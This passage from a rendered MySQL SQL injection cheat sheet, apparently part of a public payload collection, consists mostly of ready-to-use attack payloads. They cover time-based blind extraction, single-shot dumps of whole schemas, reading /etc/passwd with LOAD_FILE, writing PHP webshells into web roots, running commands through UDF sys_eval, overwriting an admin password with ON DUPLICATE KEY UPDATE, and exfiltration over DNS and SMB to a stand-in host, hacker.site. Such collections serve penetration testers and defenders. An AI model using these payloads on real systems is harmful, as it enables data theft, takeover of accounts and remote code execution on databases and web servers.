<div class="highlight"><pre><span></span><code><a id="__codelineno-28-1" name="__codelineno-28-1" href="#__codelineno-28-1"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="k">IF</span><span class="p">(</span><span class="n">ASCII</span><span class="p">(</span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="k">USER</span><span class="p">()),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)))</span><span class="o">&gt;=</span><span class="mi">100</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">BENCHMARK</span><span class="p">(</span><span class="mi">2000000</span><span class="p">,</span><span class="n">MD5</span><span class="p">(</span><span class="n">NOW</span><span class="p">())))</span><span class="w"> </span><span class="c1">--</span>
<a id="__codelineno-28-2" name="__codelineno-28-2" href="#__codelineno-28-2"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="k">IF</span><span class="p">(</span><span class="n">ASCII</span><span class="p">(</span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="k">USER</span><span class="p">()),</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">)))</span><span class="o">&gt;=</span><span class="mi">100</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">3</span><span class="p">))</span><span class="w"> </span><span class="c1">--</span>
<a id="__codelineno-28-3" name="__codelineno-28-3" href="#__codelineno-28-3"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">OR</span><span class="w"> </span><span class="k">IF</span><span class="p">(</span><span class="n">MID</span><span class="p">(</span><span class="o">@@</span><span class="k">version</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="s1">&#39;5&#39;</span><span class="p">,</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">),</span><span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="err">&#39;</span><span class="mi">2</span>
</code></pre></div>
<h2 id="mysql-dios-dump-in-one-shot">MYSQL DIOS - Dump in One Shot</h2>
<p>DIOS (Dump In One Shot) SQL Injection is an advanced technique that allows an attacker to extract entire database contents in a single, well-crafted SQL injection payload. This method leverages the ability to concatenate multiple pieces of data into a single result set, which is then returned in one response from the database.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-29-1" name="__codelineno-29-1" href="#__codelineno-29-1"></a><span class="p">(</span><span class="k">select</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="p">(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">x00</span><span class="p">),(</span><span class="k">select</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="p">)</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="p">(</span><span class="n">table_schema</span><span class="o">&gt;=@</span><span class="p">)</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">in</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">concat</span><span class="p">(</span><span class="o">@</span><span class="p">,</span><span class="mi">0</span><span class="n">x0D</span><span class="p">,</span><span class="mi">0</span><span class="n">x0A</span><span class="p">,</span><span class="s1">&#39; [ &#39;</span><span class="p">,</span><span class="n">table_schema</span><span class="p">,</span><span class="s1">&#39; ] &gt; &#39;</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="s1">&#39; &gt; &#39;</span><span class="p">,</span><span class="k">column_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x7C</span><span class="p">))))</span><span class="n">a</span><span class="p">)</span><span class="o">#</span>
<a id="__codelineno-29-2" name="__codelineno-29-2" href="#__codelineno-29-2"></a><span class="p">(</span><span class="k">select</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="p">(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">x00</span><span class="p">),(</span><span class="k">select</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="p">(</span><span class="n">db_data</span><span class="p">.</span><span class="n">table_data</span><span class="p">)</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">in</span><span class="w"> </span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">concat</span><span class="p">(</span><span class="o">@</span><span class="p">,</span><span class="mi">0</span><span class="n">x0D</span><span class="p">,</span><span class="mi">0</span><span class="n">x0A</span><span class="p">,</span><span class="mi">0</span><span class="n">x7C</span><span class="p">,</span><span class="s1">&#39; [ &#39;</span><span class="p">,</span><span class="n">column_data1</span><span class="p">,</span><span class="s1">&#39; ] &gt; &#39;</span><span class="p">,</span><span class="n">column_data2</span><span class="p">,</span><span class="s1">&#39; &gt; &#39;</span><span class="p">,</span><span class="mi">0</span><span class="n">x7C</span><span class="p">))))</span><span class="n">a</span><span class="p">)</span><span class="o">#</span>
</code></pre></div>
<ul>
<li>
<p>SecurityIdiots
<div class="highlight"><pre><span></span><code><a id="__codelineno-30-1" name="__codelineno-30-1" href="#__codelineno-30-1"></a><span class="n">make_set</span><span class="p">(</span><span class="mi">6</span><span class="p">,</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">x0a</span><span class="p">,(</span><span class="k">select</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="p">)</span><span class="k">where</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">make_set</span><span class="p">(</span><span class="mi">511</span><span class="p">,</span><span class="o">@</span><span class="p">,</span><span class="mi">0</span><span class="n">x3c6c693e</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="k">column_name</span><span class="p">)),</span><span class="o">@</span><span class="p">)</span>
</code></pre></div></p>
</li>
<li>
<p>Profexer
<div class="highlight"><pre><span></span><code><a id="__codelineno-31-1" name="__codelineno-31-1" href="#__codelineno-31-1"></a><span class="p">(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">x00</span><span class="p">),(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="p">)</span><span class="k">where</span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">in</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">concat</span><span class="p">(</span><span class="o">@</span><span class="p">,</span><span class="mi">0</span><span class="n">x3C62723E</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="k">column_name</span><span class="p">))))</span><span class="n">a</span><span class="p">)</span>
</code></pre></div></p>
</li>
<li>
<p>Dr.Z3r0
<div class="highlight"><pre><span></span><code><a id="__codelineno-32-1" name="__codelineno-32-1" href="#__codelineno-32-1"></a><span class="p">(</span><span class="k">select</span><span class="p">(</span><span class="k">select</span><span class="w"> </span><span class="n">concat</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">xa7</span><span class="p">,(</span><span class="k">select</span><span class="w"> </span><span class="k">count</span><span class="p">(</span><span class="o">*</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="p">)</span><span class="k">where</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">concat</span><span class="p">(</span><span class="o">@</span><span class="p">,</span><span class="mi">0</span><span class="n">x3c6c693e</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="k">column_name</span><span class="p">))),</span><span class="o">@</span><span class="p">))</span>
</code></pre></div></p>
</li>
<li>
<p>M@dBl00d
<div class="highlight"><pre><span></span><code><a id="__codelineno-33-1" name="__codelineno-33-1" href="#__codelineno-33-1"></a><span class="p">(</span><span class="k">Select</span><span class="w"> </span><span class="n">export_set</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="p">,(</span><span class="k">select</span><span class="w"> </span><span class="k">count</span><span class="p">(</span><span class="o">*</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="p">)</span><span class="k">where</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">export_set</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span><span class="n">export_set</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span><span class="o">@</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x3c6c693e</span><span class="p">,</span><span class="mi">2</span><span class="p">),</span><span class="k">column_name</span><span class="p">,</span><span class="mi">0</span><span class="n">xa3a</span><span class="p">,</span><span class="mi">2</span><span class="p">)),</span><span class="o">@</span><span class="p">,</span><span class="mi">2</span><span class="p">))</span>
</code></pre></div></p>
</li>
<li>
<p>Zen
<div class="highlight"><pre><span></span><code><a id="__codelineno-34-1" name="__codelineno-34-1" href="#__codelineno-34-1"></a><span class="o">+</span><span class="n">make_set</span><span class="p">(</span><span class="mi">6</span><span class="p">,</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">x0a</span><span class="p">,(</span><span class="k">select</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="p">)</span><span class="k">where</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">make_set</span><span class="p">(</span><span class="mi">511</span><span class="p">,</span><span class="o">@</span><span class="p">,</span><span class="mi">0</span><span class="n">x3c6c693e</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="k">column_name</span><span class="p">)),</span><span class="o">@</span><span class="p">)</span>
</code></pre></div></p>
</li>
<li>
<p>sharik
<div class="highlight"><pre><span></span><code><a id="__codelineno-35-1" name="__codelineno-35-1" href="#__codelineno-35-1"></a><span class="p">(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="n">a</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="n">a</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">x00</span><span class="p">),(</span><span class="k">select</span><span class="p">(</span><span class="o">@</span><span class="n">a</span><span class="p">)</span><span class="k">from</span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="p">)</span><span class="k">where</span><span class="p">(</span><span class="n">table_schema</span><span class="o">!=</span><span class="mi">0</span><span class="n">x696e666f726d6174696f6e5f736368656d61</span><span class="p">)</span><span class="k">and</span><span class="p">(</span><span class="o">@</span><span class="n">a</span><span class="p">)</span><span class="k">in</span><span class="p">(</span><span class="o">@</span><span class="n">a</span><span class="p">:</span><span class="o">=</span><span class="n">concat</span><span class="p">(</span><span class="o">@</span><span class="n">a</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x203a3a20</span><span class="p">,</span><span class="k">column_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x3c62723e</span><span class="p">))))</span><span class="n">a</span><span class="p">)</span>
</code></pre></div></p>
</li>
</ul>
<h2 id="mysql-current-queries">MYSQL Current Queries</h2>
<p><code>INFORMATION_SCHEMA.PROCESSLIST</code> is a special table available in MySQL and MariaDB that provides information about active processes and threads within the database server. This table can list all operations that DB is performing at the moment.</p>
<p>The <code>PROCESSLIST</code> table contains several important columns, each providing details about the current processes. Common columns include: </p>
<ul>
<li><strong>ID</strong> : The process identifier.</li>
<li><strong>USER</strong> : The MySQL user who is running the process.</li>
<li><strong>HOST</strong> : The host from which the process was initiated.</li>
<li><strong>DB</strong> : The database the process is currently accessing, if any.</li>
<li><strong>COMMAND</strong> : The type of command the process is executing (e.g., Query, Sleep).</li>
<li><strong>TIME</strong> : The time in seconds that the process has been running.</li>
<li><strong>STATE</strong> : The current state of the process.</li>
<li><strong>INFO</strong> : The text of the statement being executed, or NULL if no statement is being executed.</li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-36-1" name="__codelineno-36-1" href="#__codelineno-36-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">PROCESSLIST</span><span class="p">;</span>
</code></pre></div>
<table>
<thead>
<tr>
<th>ID</th>
<th>USER</th>
<th>HOST</th>
<th>DB</th>
<th>COMMAND</th>
<th>TIME</th>
<th>STATE</th>
<th>INFO</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>root</td>
<td>localhost</td>
<td>testdb</td>
<td>Query</td>
<td>10</td>
<td>executing</td>
<td>SELECT * FROM some_table</td>
</tr>
<tr>
<td>2</td>
<td>app_uset</td>
<td>192.168.0.101</td>
<td>appdb</td>
<td>Sleep</td>
<td>300</td>
<td>sleeping</td>
<td>NULL</td>
</tr>
<tr>
<td>3</td>
<td>gues_user</td>
<td>example.com:3360</td>
<td>NULL</td>
<td>Connect</td>
<td>0</td>
<td>connecting</td>
<td>NULL</td>
</tr>
</tbody>
</table>
<div class="highlight"><pre><span></span><code><a id="__codelineno-37-1" name="__codelineno-37-1" href="#__codelineno-37-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="k">state</span><span class="p">,</span><span class="n">info</span><span class="p">,</span><span class="mi">4</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">PROCESSLIST</span><span class="w"> </span><span class="o">#</span>
</code></pre></div>
<p>Dump in one shot query to extract the whole content of the table.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-38-1" name="__codelineno-38-1" href="#__codelineno-38-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,(</span><span class="k">SELECT</span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">FROM</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">X00</span><span class="p">),(</span><span class="k">SELECT</span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">FROM</span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">processlist</span><span class="p">)</span><span class="k">WHERE</span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">IN</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">CONCAT</span><span class="p">(</span><span class="o">@</span><span class="p">,</span><span class="mi">0</span><span class="n">x3C62723E</span><span class="p">,</span><span class="k">state</span><span class="p">,</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="n">info</span><span class="p">))))</span><span class="n">a</span><span class="p">),</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="w"> </span><span class="o">#</span>
</code></pre></div>
<h2 id="mysql-read-content-of-a-file">MYSQL Read Content of a File</h2>
<p>Need the <code>filepriv</code>, otherwise you will get the error : <code>ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-39-1" name="__codelineno-39-1" href="#__codelineno-39-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">ALL</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="s1">&#39;/etc/passwd&#39;</span><span class="p">)</span><span class="w"> </span><span class="c1">--</span>
<a id="__codelineno-39-2" name="__codelineno-39-2" href="#__codelineno-39-2"></a><span class="k">UNION</span><span class="w"> </span><span class="k">ALL</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">TO_base64</span><span class="p">(</span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="s1">&#39;/var/www/html/index.php&#39;</span><span class="p">));</span>
</code></pre></div>
<p>If you are <code>root</code> on the database, you can re-enable the <code>LOAD_FILE</code> using the following query</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-40-1" name="__codelineno-40-1" href="#__codelineno-40-1"></a><span class="k">GRANT</span><span class="w"> </span><span class="n">FILE</span><span class="w"> </span><span class="k">ON</span><span class="w"> </span><span class="o">*</span><span class="p">.</span><span class="o">*</span><span class="w"> </span><span class="k">TO</span><span class="w"> </span><span class="s1">&#39;root&#39;</span><span class="o">@</span><span class="s1">&#39;localhost&#39;</span><span class="p">;</span><span class="w"> </span><span class="n">FLUSH</span><span class="w"> </span><span class="k">PRIVILEGES</span><span class="p">;</span><span class="o">#</span>
</code></pre></div>
<h2 id="mysql-command-execution">MYSQL Command Execution</h2>
<h3 id="webshell-outfile-method">WEBSHELL - OUTFILE Method</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-41-1" name="__codelineno-41-1" href="#__codelineno-41-1"></a><span class="p">[...]</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="ss">&quot;&lt;?php system($_GET[&#39;cmd&#39;]); ?&gt;&quot;</span><span class="w"> </span><span class="k">into</span><span class="w"> </span><span class="n">outfile</span><span class="w"> </span><span class="ss">&quot;C:\\xampp\\htdocs\\backdoor.php&quot;</span>
<a id="__codelineno-41-2" name="__codelineno-41-2" href="#__codelineno-41-2"></a><span class="p">[...]</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="s1">&#39;&#39;</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">OUTFILE</span><span class="w"> </span><span class="s1">&#39;/var/www/html/x.php&#39;</span><span class="w"> </span><span class="n">FIELDS</span><span class="w"> </span><span class="n">TERMINATED</span><span class="w"> </span><span class="k">BY</span><span class="w"> </span><span class="s1">&#39;&lt;?php phpinfo();?&gt;&#39;</span>
<a id="__codelineno-41-3" name="__codelineno-41-3" href="#__codelineno-41-3"></a><span class="p">[...]</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">0</span><span class="n">x3c3f70687020706870696e666f28293b203f3e</span><span class="w"> </span><span class="k">into</span><span class="w"> </span><span class="n">outfile</span><span class="w"> </span><span class="s1">&#39;C:\\wamp\\www\\pwnd.php&#39;</span><span class="c1">-- -</span>
<a id="__codelineno-41-4" name="__codelineno-41-4" href="#__codelineno-41-4"></a><span class="p">[...]</span><span class="w"> </span><span class="k">union</span><span class="w"> </span><span class="k">all</span><span class="w"> </span><span class="k">select</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="ss">&quot;&lt;?php echo shell_exec($_GET[&#39;cmd&#39;]);?&gt;&quot;</span><span class="p">,</span><span class="mi">6</span><span class="w"> </span><span class="k">into</span><span class="w"> </span><span class="n">OUTFILE</span><span class="w"> </span><span class="s1">&#39;c:/inetpub/wwwroot/backdoor.php&#39;</span>
</code></pre></div>
<h3 id="webshell-dumpfile-method">WEBSHELL - DUMPFILE Method</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-42-1" name="__codelineno-42-1" href="#__codelineno-42-1"></a><span class="p">[...]</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">0</span><span class="n">xPHP_PAYLOAD_IN_HEX</span><span class="p">,</span><span class="w"> </span><span class="k">NULL</span><span class="p">,</span><span class="w"> </span><span class="k">NULL</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">DUMPFILE</span><span class="w"> </span><span class="s1">&#39;C:/Program Files/EasyPHP-12.1/www/shell.php&#39;</span>
<a id="__codelineno-42-2" name="__codelineno-42-2" href="#__codelineno-42-2"></a><span class="p">[...]</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">0</span><span class="n">x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">DUMPFILE</span><span class="w"> </span><span class="s1">&#39;/var/www/html/images/shell.php&#39;</span><span class="p">;</span>
</code></pre></div>
<h3 id="command-udf-library">COMMAND - UDF Library</h3>
<p>First you need to check if the UDF are installed on the server.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-43-1" name="__codelineno-43-1" href="#__codelineno-43-1"></a><span class="p">$</span> <span class="n">whereis</span> <span class="n">lib_mysqludf_sys</span><span class="p">.</span><span class="n">so</span>
<a id="__codelineno-43-2" name="__codelineno-43-2" href="#__codelineno-43-2"></a><span class="p">/</span><span class="n">usr</span><span class="p">/</span><span class="n">lib</span><span class="p">/</span><span class="n">lib_mysqludf_sys</span><span class="p">.</span><span class="n">so</span>
</code></pre></div>
<p>Then you can use functions such as <code>sys_exec</code> and <code>sys_eval</code>.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-44-1" name="__codelineno-44-1" href="#__codelineno-44-1"></a><span class="err">$</span><span class="w"> </span><span class="n">mysql</span><span class="w"> </span><span class="o">-</span><span class="n">u</span><span class="w"> </span><span class="n">root</span><span class="w"> </span><span class="o">-</span><span class="n">p</span><span class="w"> </span><span class="n">mysql</span>
<a id="__codelineno-44-2" name="__codelineno-44-2" href="#__codelineno-44-2"></a><span class="n">Enter</span><span class="w"> </span><span class="n">password</span><span class="p">:</span><span class="w"> </span><span class="p">[...]</span>
<a id="__codelineno-44-3" name="__codelineno-44-3" href="#__codelineno-44-3"></a>
<a id="__codelineno-44-4" name="__codelineno-44-4" href="#__codelineno-44-4"></a><span class="n">mysql</span><span class="o">&gt;</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">sys_eval</span><span class="p">(</span><span class="s1">&#39;id&#39;</span><span class="p">);</span>
<a id="__codelineno-44-5" name="__codelineno-44-5" href="#__codelineno-44-5"></a><span class="o">+</span><span class="c1">--------------------------------------------------+</span>
<a id="__codelineno-44-6" name="__codelineno-44-6" href="#__codelineno-44-6"></a><span class="o">|</span><span class="w"> </span><span class="n">sys_eval</span><span class="p">(</span><span class="s1">&#39;id&#39;</span><span class="p">)</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-44-7" name="__codelineno-44-7" href="#__codelineno-44-7"></a><span class="o">+</span><span class="c1">--------------------------------------------------+</span>
<a id="__codelineno-44-8" name="__codelineno-44-8" href="#__codelineno-44-8"></a><span class="o">|</span><span class="w"> </span><span class="n">uid</span><span class="o">=</span><span class="mi">118</span><span class="p">(</span><span class="n">mysql</span><span class="p">)</span><span class="w"> </span><span class="n">gid</span><span class="o">=</span><span class="mi">128</span><span class="p">(</span><span class="n">mysql</span><span class="p">)</span><span class="w"> </span><span class="n">groups</span><span class="o">=</span><span class="mi">128</span><span class="p">(</span><span class="n">mysql</span><span class="p">)</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-44-9" name="__codelineno-44-9" href="#__codelineno-44-9"></a><span class="o">+</span><span class="c1">--------------------------------------------------+</span>
</code></pre></div>
<h2 id="mysql-insert">MYSQL INSERT</h2>
<p><code>ON DUPLICATE KEY UPDATE</code> keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:</p>
<p>Inject using payload:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-45-1" name="__codelineno-45-1" href="#__codelineno-45-1"></a><span class="n">attacker_dummy</span><span class="o">@</span><span class="n">example</span><span class="p">.</span><span class="n">com</span><span class="ss">&quot;, &quot;</span><span class="n">P</span><span class="o">@</span><span class="n">ssw0rd</span><span class="ss">&quot;), (&quot;</span><span class="k">admin</span><span class="o">@</span><span class="n">example</span><span class="p">.</span><span class="n">com</span><span class="ss">&quot;, &quot;</span><span class="n">P</span><span class="o">@</span><span class="n">ssw0rd</span><span class="ss">&quot;) ON DUPLICATE KEY UPDATE password=&quot;</span><span class="n">P</span><span class="o">@</span><span class="n">ssw0rd</span><span class="err">&quot;</span><span class="w"> </span><span class="c1">--</span>
</code></pre></div>
<p>The query would look like this:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-46-1" name="__codelineno-46-1" href="#__codelineno-46-1"></a><span class="k">INSERT</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">users</span><span class="w"> </span><span class="p">(</span><span class="n">email</span><span class="p">,</span><span class="w"> </span><span class="n">password</span><span class="p">)</span><span class="w"> </span><span class="k">VALUES</span><span class="w"> </span><span class="p">(</span><span class="ss">&quot;attacker_dummy@example.com&quot;</span><span class="p">,</span><span class="w"> </span><span class="ss">&quot;BCRYPT_HASH&quot;</span><span class="p">),</span><span class="w"> </span><span class="p">(</span><span class="ss">&quot;admin@example.com&quot;</span><span class="p">,</span><span class="w"> </span><span class="ss">&quot;P@ssw0rd&quot;</span><span class="p">)</span><span class="w"> </span><span class="k">ON</span><span class="w"> </span><span class="n">DUPLICATE</span><span class="w"> </span><span class="k">KEY</span><span class="w"> </span><span class="k">UPDATE</span><span class="w"> </span><span class="n">password</span><span class="o">=</span><span class="ss">&quot;P@ssw0rd&quot;</span><span class="w"> </span><span class="c1">-- &quot;, &quot;BCRYPT_HASH_OF_YOUR_PASSWORD_INPUT&quot;);</span>
</code></pre></div>
<p>This query will insert a row for the user "attacker_dummy@example.com". It will also insert a row for the user "admin@example.com".</p>
<p>Because this row already exists, the <code>ON DUPLICATE KEY UPDATE</code> keyword tells MySQL to update the <code>password</code> column of the already existing row to "P@ssw0rd". After this, we can simply authenticate with "admin@example.com" and the password "P@ssw0rd".</p>
<h2 id="mysql-truncation">MYSQL Truncation</h2>
<p>In MYSQL "<code>admin</code>" and "<code>admin</code>" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-47-1" name="__codelineno-47-1" href="#__codelineno-47-1"></a><span class="o">`</span><span class="n">username</span><span class="o">`</span><span class="w"> </span><span class="nb">varchar</span><span class="p">(</span><span class="mi">20</span><span class="p">)</span><span class="w"> </span><span class="k">not</span><span class="w"> </span><span class="k">null</span>
</code></pre></div>
<p>Payload: <code>username = "admin a"</code></p>
<h2 id="mysql-out-of-band">MYSQL Out of Band</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-48-1" name="__codelineno-48-1" href="#__codelineno-48-1"></a><span class="nb">SELECT </span><span class="nv">@@version</span> <span class="n">INTO</span> <span class="n">OUTFILE</span> <span class="s1">&#39;\\\\192.168.0.100\\temp\\out.txt&#39;</span><span class="p">;</span>
<a id="__codelineno-48-2" name="__codelineno-48-2" href="#__codelineno-48-2"></a><span class="nb">SELECT </span><span class="nv">@@version</span> <span class="n">INTO</span> <span class="n">DUMPFILE</span> <span class="err">&#39;</span><span class="p">\\\\</span><span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">100</span><span class="p">\\</span><span class="n">temp</span><span class="p">\\</span><span class="n">out</span><span class="p">.</span><span class="n">txt</span><span class="p">;</span>
</code></pre></div>
<h3 id="dns-exfiltration">DNS Exfiltration</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-49-1" name="__codelineno-49-1" href="#__codelineno-49-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="n">CONCAT</span><span class="p">(</span><span class="s1">&#39;\\\\&#39;</span><span class="p">,</span><span class="k">VERSION</span><span class="p">(),</span><span class="s1">&#39;.hacker.site\\a.txt&#39;</span><span class="p">));</span>
<a id="__codelineno-49-2" name="__codelineno-49-2" href="#__codelineno-49-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="n">CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">x5c5c5c5c</span><span class="p">,</span><span class="k">VERSION</span><span class="p">(),</span><span class="mi">0</span><span class="n">x2e6861636b65722e736974655c5c612e747874</span><span class="p">))</span>
</code></pre></div>
